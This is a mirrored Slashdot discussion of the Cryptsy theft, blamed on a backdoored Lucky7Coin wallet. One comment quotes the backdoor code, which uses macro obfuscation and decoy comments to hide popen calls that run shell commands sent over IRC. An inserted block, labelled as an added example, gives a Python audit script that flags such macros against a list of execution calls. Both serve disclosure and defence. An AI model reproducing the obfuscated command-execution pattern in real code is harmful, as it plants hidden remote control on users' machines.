Slashdot Mirror


Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com)

An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands at more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally, this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.

12 of 90 comments

  1. No sympathy here. by Anonymous Coward · · Score: 5, Insightful

    Crypto currencies are like the wild wild west of monetary transactions. Unless you are doing something that requires absolute discretion, it's really not worth the risk.

    1. Re:No sympathy here. by SirSlud · · Score: 2

      All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?

      --
      "Old man yells at systemd"
  2. HA HA by NotQuiteReal · · Score: 2

    (voice of Nelson)

    --
    This issue is a bit more complicated than you think.
    1. Re:HA HA by murdocj · · Score: 2

      Was it teleported out via a backdoor in the broker software? Or do you still own those shares and will the value come back as the market rises?

  3. Found a Trojan in the wallet? by DesertNomad · · Score: 5, Funny

    Must be a slow news day...

  4. Summary is a lot of spin also... by thesupraman · · Score: 2

    Well, as the current Litecoin value is around $3, I don't think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
    The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers' wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?

  5. Over and over by JustAnotherOldGuy · · Score: 4, Insightful

    This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.

    Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them is going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.

    Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.

    I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.

    I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...

    --
    Just cruising through this digital world at 33 1/3 rpm...
  6. Re:Huh? by gstoddart · · Score: 2

    It's been bad security for months.

    Why people expect a robust, mature, and functioning degree of security in something which is brand new, and essentially the wild west is beyond me.

    How many huge bitcoin thefts have there been? And just why would we think something which has value isn't going to be the target of theft?

    These are lessons the banking industry has learned over decades, and taken steps to prevent.

    But suddenly someone invents crypto currency and they act all surprised to get ripped off ... and then they all stand around wondering why the magical unicorns which were supposed to make these things perfect don't really exist.

    Why the fuck do people keep believing that some wallet or exchange which came into existence a few months ago is secure? There are no regulations, and not nearly enough history of having to get it right to have any faith in that.

    This is "unexpected" in no way that I can tell. In fact, it's entirely what people have predicted.

    Whatever. Let's stop pretending this is surprising to anybody. These are inherent flaws in the platform, and pretending otherwise is just sad.

    --
    Lost at C:>. Found at C.
  7. known for months by Gravis+Zero · · Score: 5, Informative

    https://github.com/alerj78/luc...

    dooglus commented on Mar 8, 2015

    There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

    In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

    /** Determine system page size in bytes */
    #define S_ORDER(a,b,c,d) b##a##d##c
    /**
     * OS-dependent memory page locking/unlocking.
     * Defined as policy class to make stubbing for test possible.
     */
    #define CLine S_ORDER(I,F,E,L)
    /**
     * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
     * std::allocator templates.
     */
    #define CRead S_ORDER(p,po,n,e)
    #define CFree S_ORDER(cl,p,e,os)
    //
    // Allocator that locks its contents from being paged
    // out of memory and clears its contents before deletion.
    //
    #define CBuff "PR" "IV" "M" "SG"

    Then in irc.cpp they are used to implement the backdoor:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

    I expect this is a known issue since this kind of thing doesn't happen accidentally.

    --
    Anons need not reply. Questions end with a question mark.
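
A source-audit check for the obfuscation quoted in the comment above, as an added example that is not part of the original comment or of the Lucky7Coin code: it expands `##` token-pasting macros and spliced string literals and reports any macro that resolves to a process-execution call. `WATCHLIST`, the function names and the shortened sample lines are assumptions of this example.

```python
import re

# Assumed watch list: libc calls a header has no reason to spell out of fragments.
WATCHLIST = {"popen", "pclose", "system", "execv", "execve", "execl", "dlopen"}
DEFINE = re.compile(r"^\s*#\s*define\s+(\w+)(\(([^)]*)\))?\s*(.*)$")
CALL = re.compile(r"^(\w+)\s*\(([^)]*)\)$")
STRINGS = re.compile(r'^"[^"]*"(\s*"[^"]*")+$')

# Macro lines as quoted in the comment above (decoy comments shortened).
SAMPLE = """\
#define S_ORDER(a,b,c,d) b##a##d##c /**
#define CLine S_ORDER(I,F,E,L) /**
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os) // Allocator that locks its contents
#define CBuff "PR" "IV" "M" "SG"
"""

def strip_comment(text):
    """Drop everything from the first // or /* on; the decoy comments trail the macros."""
    return re.split(r"//|/\*", text, maxsplit=1)[0].strip()

def resolve_macros(source):
    """Map each macro built by ## pasting or literal splicing to the text it expands to."""
    pasters, resolved = {}, {}
    for line in source.splitlines():
        m = DEFINE.match(line)
        if not m:
            continue
        name, params, body = m.group(1), m.group(3), strip_comment(m.group(4))
        call = CALL.match(body)
        if m.group(2) and "##" in body:
            # Function-like macro whose body only glues its parameters together.
            pasters[name] = ([p.strip() for p in params.split(",")],
                             [t.strip() for t in body.split("##")])
        elif call and call.group(1) in pasters:
            names, order = pasters[call.group(1)]
            args = dict(zip(names, (a.strip() for a in call.group(2).split(","))))
            resolved[name] = "".join(args.get(tok, tok) for tok in order)
        elif STRINGS.match(body):
            # Adjacent string literals are concatenated by the compiler.
            resolved[name] = "".join(re.findall(r'"([^"]*)"', body))
    return resolved

def suspicious(source):
    """Names of macros that resolve to a watch-listed identifier."""
    return sorted(k for k, v in resolve_macros(source).items() if v in WATCHLIST)

if __name__ == "__main__":
    print(resolve_macros(SAMPLE), suspicious(SAMPLE))
```
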
    1. Re:known for months by Razed+By+TV · · Score: 2

      Theft happened July 29, 2014, way before that post.

    2. Re: known for months by Anonymous Coward · · Score: 2, Informative

      IRC was one of the initial means of peer discovery. It has been long since replaced with better mechanisms.

  8. The Developer of Lucky7Coin... by Fnord666 · · Score: 4, Informative

    It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new GitHub repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.

    --
    'The tyrant will always find pretext for his tyranny.' - Aesop's Fables